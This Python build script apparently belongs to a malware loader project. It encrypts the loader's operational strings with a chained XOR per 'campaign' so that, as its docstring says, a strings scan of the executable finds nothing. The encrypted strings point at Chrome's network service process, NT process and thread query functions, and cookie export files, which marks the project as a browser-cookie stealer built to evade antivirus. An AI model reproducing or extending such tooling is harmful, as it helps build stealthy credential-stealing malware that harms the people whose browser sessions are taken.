#!/usr/bin/env python3
"""gen_loader_strings.py — emit the loader's encrypted operational strings.

Same scheme as the blob needles (scripts/gen_needles.py): chained-XOR with
a per-campaign key, decrypted at runtime into stack buffers and wiped
after use.  Kills every intent-revealing literal from the PE (a strings
scan must find nothing).  Key derivation: ((fnv_seed >> 11) & 0xFF).
Exfil/C2 delivery is deliberately NOT part of this project: the loader is
C2-agnostic and everyone wires their own channel around it.

Run after changing the table or the campaign seed:

    python3 scripts/gen_loader_strings.py
"""

import json
import pathlib

ROOT = pathlib.Path(__file__).resolve().parent.parent

# name -> payload; "w" entries are UTF-16LE (wide) strings
STRINGS = {
    "needle_network": (b"utility-sub-type=network.mojom.NetworkService\x00\x00", "w"),
    "chrome_exe":     (b"chrome.exe\x00\x00", "w"),
    "ntdll":          (b"ntdll.dll\x00", "a"),
    "ntqip":          (b"NtQueryInformationProcess\x00", "a"),
    "ntqit":          (b"NtQueryInformationThread\x00", "a"),
    "json_editor":    (b"cookies_export.json\x00", "a"),
    "json_storage":   (b"cookies_storageace.json\x00", "a"),
}


def chained_xor(data: bytes, key: int) -> bytes:
    out = bytearray()
    for i, b in enumerate(data):
        c = b ^ key
        out.append(c)
        key = (key + c + i) & 0xFF
    return bytes(out)


def main() -> int:
    cfg = json.loads((ROOT / "scripts/hash_seed").read_text())
    fnv = int(cfg["fnv_seed"], 16)
    key = (fnv >> 11) & 0xFF
    campaign = cfg.get("campaign", "?")

    lines = [
        "/* generated by scripts/gen_loader_strings.py — campaign " + campaign,
        " * do not edit; regenerate after changing the table or hash_seed.",
        " * chained-XOR, key = (fnv_seed >> 11) & 0xFF; runtime decrypt in",
        " * loader.c (lstr_*).  Wide entries are UTF-16LE bytes. */",
        "#ifndef MARGARET_LSTRINGS_H",
        "#define MARGARET_LSTRINGS_H",
        "",
        f"#define LSTRING_XOR_KEY 0x{key:02X}u",
        "",
    ]
    for name, (plain, kind) in STRINGS.items():
        if kind == "w":
            plain = plain.decode("ascii", errors="ignore").encode("utf-16-le")
            plain += b"\x00\x00"
        enc = chained_xor(plain, key)
        lines.append(f"#define LSTRING_{name.upper()}_LEN {len(enc)}u")
        lines.append(
            f"static const unsigned char lstring_{name}[LSTRING_{name.upper()}_LEN] = {{"
        )
        for i in range(0, len(enc), 16):
            chunk = enc[i : i + 16]
            lines.append("    " + ", ".join(f"0x{b:02X}" for b in chunk) + ",")
        lines.append("};")
        lines.append("")
    lines.append("#endif /* MARGARET_LSTRINGS_H */")
    lines.append("")

    out = ROOT / "loader/lstrings.h"
    out.write_text("\n".join(lines))
    print(f"[lstrings] key=0x{key:02X} -> {out} ({len(STRINGS)} stringhe)")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
